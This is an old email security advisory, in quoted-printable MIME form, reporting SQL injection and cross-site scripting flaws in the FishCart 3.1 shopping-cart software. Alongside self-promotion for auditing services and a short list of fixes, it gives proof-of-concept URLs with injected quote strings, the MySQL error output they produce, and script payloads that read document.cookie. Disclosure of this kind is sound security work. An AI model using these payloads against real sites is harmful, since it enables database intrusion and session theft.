------=_NextPart_001_005A_01C55049.DEF610F0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. =
Learn more at http://www.digitalparadox.org/services.ah
***SPECIAL OFFER***
Hire my auditing services, if I dont find anything, its FREE..!! =
http://www.digitalparadox.org/services.ah
Looking for Publishers intrested in my Php Secure Coding Book.
Severity: High
Title: Multiple SQL injections and XSS in FishCart 3.1
Date: 4/05/2005
Vendor: FishNet Inc
Vendor Website: http://www.fishnetinc.com
Summary: There are, multiple sql injections and xss in fishcart 3.1.
Proof of Concept Exploits:=20
http://example.com/demo31/display.php?cartid=3D200505024231092&zid=3D1&li=
d=3D1&nlst=3D'">&olimit=3D0&cat=3D=
&key1=3D&psku=3D
XSS
http://example.com/demo31/display.php?cartid=3D200505024231092&zid=3D1&li=
d=3D1&nlst=3Dy&olimit=3D0&cat=3D&key1=3D&psku=3D'SQL_INJECTION
SQL INJECTION
Database error: Invalid SQL: select count(*) as cnt from =
cvsdemo31prod,cvsdemo31prodlang where nzid=3D1 and nprodsku=3Dprodsku =
and prodzid=3D1 and nprodsku=3Dprodlsku and prodlzid=3D1 and =
prodlid=3D1prodsku=3D'''SQL_INJECTION' and prodlsku=3D'''SQL_INJECTION' =
and prodzid=3D1 and prodzid=3Dprodlzid and prodlid=3D1 and =
(produseinvq=3D0 or (produseinvq=3D1 and prodinvqty>0))
MySQL Error: 1054 (Unknown column 'nzid' in 'where clause')
Session halted.
http://example.com/demo31/upstnt.php?zid=3D1&lid=3D1&cartid=3D'SQL_INJECT=
ION
SQL INJECTION
Database error: Invalid SQL: select sku,qty from cvsdemo31oline where =
orderid=3D''SQL_INJECTION'
MySQL Error: 1064 (You have an error in your SQL syntax near =
'SQL_INJECTION'' at line 1)
Session halted.
http://example.com/demo31/upstracking.php?trackingnum=3D'">&reqagree=3Dchecked&m=3D
XSS
http://example.com/demo31/upstracking.php?trackingnum=3D&reqagree=3D'">alert(document.cookie)&m=3D
XSS
http://example.com/demo31/upstracking.php?trackingnum=3D&reqagree=3Dcheck=
ed&m=3D'">
XSS
Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), =
mysql_real_escape_string() and other functions for input validation =
before passing user input to the mysql database, or before echoing data =
on the screen, would solve these problems.
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:=20
These vulnerabilities have been found and released by Diabolic Crab, =
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =
contact me regarding these vulnerabilities. You can find me at, =
http://www.hackerscenter.com or http://digitalparadox.org/.
-------------------------------------------------------------------------=
-------
Sincerely,=20
Diabolic Crab=20
------=_NextPart_001_005A_01C55049.DEF610F0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Get Dcrab's Services to audit your Web =
servers,=20
scripts, networks, etc. Learn more at http://www.digitalpara=
dox.org/services.ah
***SPECIAL OFFER***
Hire my auditing =
services,=20
if I dont find anything, its FREE..!! http://www.digitalpara=
dox.org/services.ah
Looking for Publishers intrested in my =
Php Secure=20
Coding Book.
Severity: High
Title: Multiple SQL =
injections=20
and XSS in FishCart 3.1
Date: 4/05/2005
Vendor: FishNet Inc
Vendor Website: =
http://www.fishnetinc.com
Summa=
ry: There=20
are, multiple sql injections and xss in fishcart 3.1.
Proof of Concept Exploits:
&reqagree=3Dchecked&m">http=
://example.com/demo31/upstracking.php?trackingnum=3D'"><script>a=
lert(document.cookie)</script>&reqagree=3Dchecked&m=3D<=
BR>XSS
&m">http://exam=
ple.com/demo31/upstracking.php?trackingnum=3D&reqagree=3D'"><sc=
ript>alert(document.cookie)</script>&m=3D
XSS